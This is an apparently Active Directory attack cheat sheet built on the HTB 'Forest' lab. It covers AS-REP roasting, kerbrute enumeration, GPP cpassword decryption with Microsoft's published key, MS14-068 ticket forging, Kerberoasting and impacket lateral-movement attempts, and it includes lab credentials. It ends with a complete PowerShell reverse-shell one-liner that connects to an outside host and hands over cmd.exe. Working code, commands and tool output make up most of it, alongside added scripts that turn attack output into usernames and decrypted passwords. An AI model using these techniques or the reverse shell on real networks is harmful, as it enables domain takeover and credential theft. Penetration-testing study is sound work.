What to try with limited or no authentication.
* AS-REP Roasting - if 'Do not require Kerberos preauthentication' is set on an account (DONT_REQ_PREAUTH in userAccountControl), the KDC returns an AS-REP encrypted with that user's password hash to anyone who asks for it, so it can be cracked offline. We can search LDAP for such accounts if we have any creds (potentially from a DNS injection); without creds, impacket's GetNPUsers.py -usersfile tries a list of names against the KDC directly.
git clone https://github.com/the-useless-one/pywerview.git
python /opt/pywerview/pywerview.py get-netuser -u USER -p 'PASSWORD' -d DOMAIN --preauth-notreq -t IP | grep -e 'useraccountcontrol' -e 'samaccountname'
samaccountname: mh_
useraccountcontrol: ['DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT', 'DONT_EXPIRE_PASSWORD']
samaccountname: kb_
useraccountcontrol: ['DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT']
samaccountname: nick.smith
useraccountcontrol: ['DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT']
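The flag names pywerview prints are just the set bits of the integer userAccountControl attribute. The script below is an added example (not from the original post and not pywerview code): it decodes that integer, applies the check a practitioner actually wants, which is DONT_REQ_PREAUTH set and ACCOUNTDISABLE clear (the --preauth-notreq filter returns disabled accounts too, and the KDC answers those with KDC_ERR_CLIENT_REVOKED rather than a hash), and writes the list in the format GetNPUsers.py -usersfile reads. The records are constructed sample data; the LDAP filter is the equivalent query for ldapsearch.

```python
"""Decode userAccountControl and list AS-REP-roastable accounts.

Added example (not from the original post or pywerview): LDAP tools return
userAccountControl as one integer; the flag names pywerview prints are the
set bits of that integer.  The records below are constructed sample data.
"""

# Bit values of userAccountControl (MS-ADTS); only the flags that matter
# for this check plus the ones seen in the pywerview output above.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

# Same check as pywerview --preauth-notreq, as an ldapsearch filter: the
# bit-AND matching rule on userAccountControl, restricted to user objects.
LDAP_FILTER = (
    "(&(samAccountType=805306368)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

# Constructed sample: (sAMAccountName, userAccountControl)
SAMPLE_RECORDS = [
    ("mh_", 0x400000 | 0x10000 | 0x200),   # roastable, enabled
    ("kb_", 0x400000 | 0x200),             # roastable, enabled
    ("nick.smith", 0x400000 | 0x200),      # roastable, enabled
    ("old.svc", 0x400000 | 0x200 | 0x2),   # flag set but account disabled
    ("andy", 0x200),                       # normal account, preauth required
]


def decode_uac(value: int) -> list:
    """Names of the set bits, lowest bit first; unknown bits are reported as hex."""
    names = []
    for bit in range(32):
        mask = 1 << bit
        if value & mask:
            names.append(UAC_FLAGS.get(mask, f"0x{mask:x}"))
    return names


def asrep_roastable(records) -> list:
    """Accounts worth roasting: DONT_REQ_PREAUTH set and the account not disabled.

    The LDAP filter alone also returns disabled accounts; the KDC answers those
    with KDC_ERR_CLIENT_REVOKED instead of an AS-REP, so they are only noise."""
    return [
        name for name, uac in records
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE
    ]


def users_file(records) -> str:
    """One name per line, the input format of GetNPUsers.py -usersfile."""
    return "\n".join(asrep_roastable(records)) + "\n"


if __name__ == "__main__":
    for name, uac in SAMPLE_RECORDS:
        print(f"{name:12s} {uac:10d} {decode_uac(uac)}")
    print("roastable:", asrep_roastable(SAMPLE_RECORDS))
    print("ldap filter:", LDAP_FILTER)
```

Feed the users file to GetNPUsers.py with -usersfile -format hashcat and crack the $krb5asrep$ lines with hashcat mode 18200.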
No Authentication
Username Enumeration - kerbrute sends AS-REQs without pre-authentication, and the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for unknown names and KDC_ERR_PREAUTH_REQUIRED for real ones, so no password is guessed and nothing gets locked out. Accounts with pre-authentication disabled come back with their AS-REP hash straight away. Each hit does log a 4768 (Kerberos TGT requested) event on the DC.
/opt/kerbrute/dist$ ./kerbrute_linux_amd64 userenum --dc 10.10.10.161 -d htb.local -t 80 /opt/wordlists/SecLists/Usernames/Names/names.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9dad6e1) - 12/16/19 - Ronnie Flathers @ropnop
2019/12/16 15:50:16 > Using KDC(s):
2019/12/16 15:50:16 > 10.10.10.161:88
2019/12/16 15:50:16 > [+] VALID USERNAME: andy@htb.local
2019/12/16 15:50:17 > [+] VALID USERNAME: forest@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME: lucinda@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME: mark@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME: sebastien@htb.local
2019/12/16 15:50:22 > Done! Tested 10163 usernames (5 valid) in 5.919 seconds
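names.txt holds first names only, which is why only first-name accounts surfaced. The script below is an added example (not part of the original post and not kerbrute code): it parses the VALID USERNAME lines kerbrute prints into a plain user list, and builds the username variants a second kerbrute or GetNPUsers.py -usersfile pass needs when only people's full names are known (from OSINT, e-mail addresses, a web page). The kerbrute output and the full names are constructed samples in the tool's own format.

```python
"""Turn a kerbrute run into the next step.

Added example, not part of the original post or of kerbrute.  The kerbrute
output below is a constructed sample in the tool's format; the full names
passed to username_variants() are constructed too.
"""
import re

SAMPLE_KERBRUTE_OUTPUT = """\
2019/12/16 15:50:16 > Using KDC(s):
2019/12/16 15:50:16 > \t10.10.10.161:88
2019/12/16 15:50:16 > [+] VALID USERNAME:\t andy@htb.local
2019/12/16 15:50:17 > [+] VALID USERNAME:\t forest@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME:\t lucinda@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME:\t mark@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME:\t sebastien@htb.local
2019/12/16 15:50:22 > Done! Tested 10163 usernames (5 valid) in 5.919 seconds
"""

# kerbrute prints "[+] VALID USERNAME:<tab> user@realm"
VALID_LINE = re.compile(r"\[\+\] VALID USERNAME:\s*([^@\s]+)@(\S+)")


def parse_kerbrute(output: str) -> list:
    """Usernames (realm stripped) in the order kerbrute found them, deduplicated."""
    seen = []
    for line in output.splitlines():
        m = VALID_LINE.search(line)
        if m and m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


def username_variants(full_name: str) -> list:
    """Common AD naming conventions for one person, e.g. "Nick Smith" ->
    nick, smith, nick.smith, nsmith, n.smith, ...  Single names pass through."""
    parts = full_name.lower().split()
    if len(parts) < 2:
        return parts
    first, last = parts[0], parts[-1]
    variants = [
        first, last,
        f"{first}.{last}", f"{first}_{last}", f"{first}-{last}",
        f"{first[0]}{last}", f"{first[0]}.{last}",
        f"{first}{last[0]}", f"{first}{last}",
        f"{last}.{first}", f"{last}{first[0]}",
    ]
    return list(dict.fromkeys(variants))   # dedupe, keep order


def wordlist(full_names) -> str:
    """One candidate per line: the format both kerbrute userenum and
    GetNPUsers.py -usersfile read."""
    out = []
    for name in full_names:
        for v in username_variants(name):
            if v not in out:
                out.append(v)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("valid users:", parse_kerbrute(SAMPLE_KERBRUTE_OUTPUT))
    print(wordlist(["Nick Smith", "Jane Doe"]))
```

The parsed list is what the AS-REP roasting step consumes when no credentials are available; the generated wordlist is what the enumeration step consumes on the next pass.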
Check for GPP passwords on the DC - any domain user can read SYSVOL, and the cpassword attribute in Group Policy Preferences XML files is encrypted with a key Microsoft published (MS14-025 stopped new ones being saved but left existing files in place):
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
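Once findstr turns up a file, the rest is mechanical. The script below is an added example, not from the original post: it parses a Group Policy Preferences XML file for cpassword values and decrypts them with the 32-byte AES key Microsoft documented in the MS-GPPREF specification, which is exactly why a read-only SYSVOL share is enough. The Groups.xml text is a constructed sample; its cpassword is the publicly known value from the retired HTB "Active" lab so the decryption can be checked. Decryption uses the third-party cryptography package (pip install cryptography); everything else is standard library.

```python
"""Locate and decrypt Group Policy Preferences passwords.

Added example, not from the original post.  The Groups.xml below is a
constructed sample in the GPP format; its cpassword is the public test
vector from the retired HTB "Active" lab.  Decryption needs the third-party
`cryptography` package.
"""
import base64
import xml.etree.ElementTree as ET

# AES-256 key published by Microsoft in MS-GPPREF ("Password Encryption").
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

SAMPLE_GROUPS_XML = r"""<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS"
        image="2" changed="2018-07-18 20:46:06"
        uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
        userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text: str) -> list:
    """(item name, cpassword, changed) for every preference item carrying a
    cpassword.  Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml,
    Drives.xml and Printers.xml all use the same <Item><Properties cpassword=/>
    layout, so one walk serves all of them."""
    root = ET.fromstring(xml_text)
    found = []
    for item in root:
        props = item.find("Properties")
        if props is None or not props.get("cpassword"):
            continue
        found.append((item.get("name"), props.get("cpassword"), item.get("changed")))
    return found


def pad_base64(value: str) -> str:
    """GPP strips the '=' padding; restore it so b64decode accepts the value."""
    return value + "=" * (-len(value) % 4)


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC with the public key, all-zero IV, PKCS#7 padding;
    the plaintext is UTF-16LE."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    ciphertext = base64.b64decode(pad_base64(cpassword))
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    return padded[:-padded[-1]].decode("utf-16-le")


if __name__ == "__main__":
    for name, cp, changed in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{name} (changed {changed}): {decrypt_cpassword(cp)}")
```

The changed attribute is worth keeping: a password set years ago in a policy that still applies is the one most likely to still be valid somewhere.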
Basic Authentication
If MS14-068 (CVE-2014-6324, Kerberos PAC signature validation bypass) is available we can forge a TGT whose PAC claims Domain Admins membership; pykek's ms14-068.py needs a valid user's password, that user's SID and the DC address. The script writing a ccache does not prove the DC is vulnerable: the ticket has to be tested (export KRB5CCNAME=TGT_svc-alfresco@htb.local.ccache, then an impacket tool with -k -no-pass), and a patched DC rejects it.
python ms14-068.py -u 'svc-alfresco@htb.local' -p 's3rvice' -s 'S-1-5-21-3072663084-364016917-1341370565-1147' -d 10.10.10.161
[+] Building AS-REQ for 10.10.10.161... Done!
[+] Sending AS-REQ to 10.10.10.161... Done!
[+] Receiving AS-REP from 10.10.10.161... Done!
[+] Parsing AS-REP from 10.10.10.161... Done!
[+] Building TGS-REQ for 10.10.10.161... Done!
[+] Sending TGS-REQ to 10.10.10.161... Done!
[+] Receiving TGS-REP from 10.10.10.161... Done!
[+] Parsing TGS-REP from 10.10.10.161... Done!
[+] Creating ccache file 'TGT_svc-alfresco@htb.local.ccache'... Done!
Kerberoasting - GetUserSPNs lists user accounts that have an SPN and, with -request, asks for a TGS ticket for each one to crack offline. 'No entries found' means no user account in the domain has an SPN, so there is nothing to roast here.
impacket-GetUserSPNs htb.local/svc-alfresco:s3rvice -dc-ip 10.10.10.161 -request
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
No entries found!
gt-ns@PTL-03:/opt/hacking/htb/10.10.10.161-forest$ sudo python /usr/share/doc/python3-impacket/examples/GetADUsers.py -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice -all
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Querying 10.10.10.161 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator Administrator@htb.local 2019-09-18 18:09:08.342879 2019-10-07 11:57:07.299606
Guest <never> <never>
DefaultAccount <never> <never>
krbtgt 2019-09-18 11:53:23.467452 <never>
$331000-VK4ADACQNUCA <never> <never>
SM_2c8eef0a09b545acb SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local <never> <never>
SM_ca8c2ed5bdab4dc9b SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local <never> <never>
SM_75a538d3025e4db9a SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local <never> <never>
SM_681f53d4942840e18 DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local <never> <never>
SM_1b41c9286325456bb Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local <never> <never>
SM_9b69f1b9d2cc45549 FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local <never> <never>
SM_7c96b981967141ebb SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local <never> <never>
SM_c75ee099d0a64c91b SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local <never> <never>
SM_1ffab36a2f5f479cb SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local <never> <never>
HealthMailboxc3d7722 HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local 2019-09-23 23:51:31.892097 2019-09-23 23:57:12.361516
HealthMailboxfc9daad HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local 2019-09-23 23:51:35.267114 2019-09-23 23:52:05.736012
HealthMailboxc0a90c9 HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local 2019-09-19 12:56:35.206329 <never>
HealthMailbox670628e HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local 2019-09-19 12:56:45.643993 <never>
HealthMailbox968e74d HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local 2019-09-19 12:56:56.143969 <never>
HealthMailbox6ded678 HealthMailbox6ded67848a234577a1756e072081d01f@htb.local 2019-09-19 12:57:06.597012 <never>
HealthMailbox83d6781 HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local 2019-09-19 12:57:17.065809 <never>
HealthMailboxfd87238 HealthMailboxfd87238e536e49e08738480d300e3772@htb.local 2019-09-19 12:57:27.487679 <never>
HealthMailboxb01ac64 HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local 2019-09-19 12:57:37.878559 <never>
HealthMailbox7108a4e HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local 2019-09-19 12:57:48.253341 <never>
HealthMailbox0659cc1 HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local 2019-09-19 12:57:58.643994 <never>
sebastien 2019-09-20 01:29:59.544725 2019-09-22 23:29:29.586227
lucinda 2019-09-20 01:44:13.233891 <never>
svc-alfresco 2019-12-15 19:50:14.415274 2019-12-15 19:36:10.741562
andy 2019-09-22 23:44:16.291082 <never>
mark 2019-09-20 23:57:30.243568 <never>
santi 2019-09-21 00:02:55.134828 <never>
wmiexec needs local administrator rights on the target (DCOM/WMI); rpc_s_access_denied means svc-alfresco does not have them.
sudo python /usr/share/doc/python3-impacket/examples/wmiexec.py -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
secretsdump -just-dc does a DCSync over DRSUAPI, which needs the Replicating Directory Changes rights (Domain Admins and Domain Controllers by default), so a plain domain user is denied:
sudo python /usr/share/doc/python3-impacket/examples/secretsdump.py -user-status -history -use-vss -just-dc -dc-ip 10.10.10.161 forest.htb.local/svc-alfresco:s3rvice@10.10.10.161
psexec uploads a service binary to a writable admin share and creates a service from it, which again needs local admin; every share is read-only for this user, so it fails:
/usr/share/doc/python3-impacket/examples/psexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
gt-ns@PTL-03:/usr/share/responder/tools$ smbmap -d htb.local -u svc-alfresco -p s3rvice -H 10.10.10.161
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.161...
[+] IP: 10.10.10.161:445 Name: 10.10.10.161
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
.
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 lsass
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 ntsvcs
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 scerpc
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-324-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 epmapper
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-1bc-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 eventlog
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-388-0
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 atsvc
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-3d8-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-244-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-244-1
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-42c-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 RpcProxy\49676
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 3a5b3f089f2a38ce
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 RpcProxy\593
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 srvsvc
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 efsrpc
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 netdfs
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-23c-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-73c-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-784-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 PSHost.132209377688684725.1492.DefaultAppDomain.powershell
IPC$ READ ONLY Remote IPC
.
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 .
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 ..
NETLOGON READ ONLY Logon server share
.
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 .
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 ..
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 htb.local
SYSVOL READ ONLY Logon server share
Reverse shell with smbmap -x and PowerShell - start a listener first (nc -lvnp 4445). smbmap -x runs the command through WMI by default (--mode psexec uses a service instead), so it needs the same admin rights that wmiexec and psexec were just denied. The copy of this one-liner circulating online calls a non-existent cleanup function; it is ReverseShellClean below.
smbmap -d htb.local -u svc-alfresco -p s3rvice -H 10.10.10.161 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""10.10.14.17""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {ReverseShellClean} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
python psexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161